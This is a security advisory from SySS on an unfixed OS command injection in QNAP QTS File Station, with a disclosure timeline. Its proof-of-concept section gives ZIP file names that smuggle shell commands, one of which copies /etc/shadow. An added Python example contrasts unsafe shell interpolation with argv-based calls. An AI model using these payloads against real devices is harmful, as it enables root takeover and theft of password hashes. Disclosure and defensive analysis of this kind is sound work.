QNAP QTS 4.2.0 Build 20160311 / Build 20160601 Command Injection
Posted Aug 18, 2016
Authored by Sebastian Nerz | Site syss.de

QNAP QTS versions 4.2.0 Build 20160311 and Build 20160601 suffer from an OS command injection vulnerability.

tags | exploit
SHA-256 | 892e6af51235735fae4ad4873dc7e3cc493bcb86a765cb905cdf1117cf7df8a9

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-048
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:


SySS GmbH found an OS command injection in the File Station of the
QTS administrative interface. A file name chosen by the user is passed
unsanitized into a shell command that File Station runs when extracting
an archive.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC, Build 20160311)

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

a;echo -e "cp \x2fetc\x2fshadow \x2fshare\x2fCACHEDEV1_DATA\x2f[current dir]" | bash ; echo .zip

(A slash cannot appear in a file name, so the paths are written with
\x2f escapes that "echo -e" turns back into "/" before the line is
piped to bash.)

3. Right-click on the ZIP file and select Extract > Extract to
[pre-selected directory with the name of the ZIP file]
(Extract > last entry)

4. The embedded command is executed; in this case /etc/shadow is copied
to the current directory. Any other command can be run as well, e.g.
to display strings on the front LCD of the QNAP (tested with a 470 Pro),
name the ZIP file as follows and extract it:

a;lcd_tool -1 PoC -2 OS-Command-Injection; echo .zip

Depending on the system this might not work out of the box.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC, Build 20160601)

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

test$(nslookup examplehost).zip

3. Right-click on the ZIP file and select Extract > Extract files

4. The embedded command is executed, which can be confirmed by watching
for the DNS lookup of "examplehost" (on the resolver, the authoritative
name server, or a packet capture of the NAS's network).

The Build 20160311 payload (Extract > last entry) no longer works on the
current release of QTS. The payload above is expected to work on earlier
versions of QTS as well.
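Both PoCs rely on the same mistake: the user-chosen file name ends up inside a command string that a shell parses. The advisory does not show the File Station code, so the vulnerable pattern below is an assumption written for this example; it is not QTS source and not SySS's code. The block contrasts that pattern with an argv-based call that never involves a shell, checks the two advisory file names for shell metacharacters, and runs a harmless stand-in for the extractor both ways so the difference is observable. `SHELL_META`, `build_extract_command_unsafe`, `extract_argv` and the demo helpers are hypothetical names; `DEMO_NAME` and `BENIGN` are constructed inputs.

```python
import shlex
import shutil
import subprocess
import sys

# Constructed inputs: the two file names from the advisory, a harmless stand-in
# payload used for the runnable demo, and an ordinary name a user might choose.
POC_20160311 = r'a;echo -e "cp \x2fetc\x2fshadow \x2fshare\x2fCACHEDEV1_DATA\x2f[current dir]" | bash ; echo .zip'
POC_20160601 = "test$(nslookup examplehost).zip"
DEMO_NAME = "test$(echo INJECTED).zip"
BENIGN = "quarterly report (2016).zip"

# Characters that let a file name escape a shell command string (a conservative
# set chosen for this example, not a QNAP definition).
SHELL_META = set(";|&$`<>(){}[]*?!\"'\\ \n\r\t")


def has_shell_metacharacters(name):
    """Return the sorted list of shell-significant characters found in `name`."""
    return sorted(SHELL_META.intersection(name))


def zip_basename(name):
    """Name without its .zip suffix; File Station derives the target directory this way."""
    return name[:-4] if name.lower().endswith(".zip") else name


def build_extract_command_unsafe(name, dest_dir):
    """Hypothetical vulnerable pattern (assumed, not QTS source): the user-chosen
    name is interpolated into one string that is later handed to `sh -c`.  The
    name appears twice, once as the archive and once in the destination path."""
    return f"unzip -o {name} -d {dest_dir}/{zip_basename(name)}"


def extract_argv(name, dest_dir):
    """Hardened pattern: the name is a single argv element and no shell parses it.
    Path traversal and option injection are checked separately, because dropping
    the shell does not cover them."""
    if not name or "/" in name or name in (".", ".."):
        raise ValueError("invalid file name")
    # A name starting with '-' would otherwise be parsed by unzip as an option.
    name_arg = name if not name.startswith("-") else "./" + name
    return ["unzip", "-o", name_arg, "-d", f"{dest_dir}/{zip_basename(name)}"]


def run_unsafe_demo(name):
    """Run a harmless stand-in for the extractor through `sh -c`.  The stand-in
    only prints its first argument; what the shell does to `name` before the
    stand-in sees it is the point.  Returns None if no POSIX shell is available."""
    if shutil.which("sh") is None:
        return None
    cmd = f'{shlex.quote(sys.executable)} -c "import sys; print(sys.argv[1])" {name}'
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def run_safe_demo(name):
    """Same stand-in invoked with an argv list: the name arrives intact."""
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", name]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    for n in (POC_20160311, POC_20160601, BENIGN):
        print(repr(n), "->", has_shell_metacharacters(n))
    print("unsafe:", build_extract_command_unsafe(POC_20160601, "/share/CACHEDEV1_DATA/Public"))
    print("safe:  ", extract_argv(POC_20160601, "/share/CACHEDEV1_DATA/Public"))
    print("sh -c :", (run_unsafe_demo(DEMO_NAME) or "").strip())
    print("argv  :", run_safe_demo(DEMO_NAME).strip())
```

Running the stand-in through `sh -c` prints `testINJECTED.zip`: the `$(...)` was expanded by the shell before the program ever saw its argument, which is exactly how the Build 20160601 payload triggers the lookup. The argv form prints the name verbatim. Note that the metacharacter check also flags the harmless `quarterly report (2016).zip` (space and parentheses), so filtering names is a brittle mitigation that breaks legitimate files; the fix is to never let a shell parse the name, and to handle `/`, `..` and leading `-` as separate concerns.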


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer has not released any security update or patch so far.
Because the attack needs only an authenticated account with permission
to upload or rename files in File Station, and yields root, administrators
of QNAP QTS 4.2 installations should ensure that only trusted
users/administrators have access to the device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-06-22: Report updated to address (minor) changes in build 20160601
2016-07-06: Updated report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-048
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-048.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.nerz-at-syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWViAAoJENEtJqSRgP2yhjUIALi90iAlcbMaJuDlxw5myP22
ULuhqRRCsqS6kR5gVrUA7eJSRHYDubXF1PlW9SoYt3bdTfRyhb1Pwf71yGggmZ+M
eCS6ImGIwKvEoJNkXsWLSV9p2hd/ha/GgTPwEa0wwUJYvuBJfadthH71WlKi7e5u
68RYX3L/IO2wylkTa6L0MJU4le48EpZOZxgcuJIXTo5qt/nDDApKS3h1W3EqNAo7
hPsm2bZPiPyynxK79H8zUIaQylFjXRnyfBhPZ7EjYI2riXkya6dk6CT7qtpt2Ljk
tpBFgduJCz/a+iFsa7yCk5U6cFLi4vpcXVVE4DUf/BvTwqM4y715sTdGdOWrg00=
=PDqZ
-----END PGP SIGNATURE-----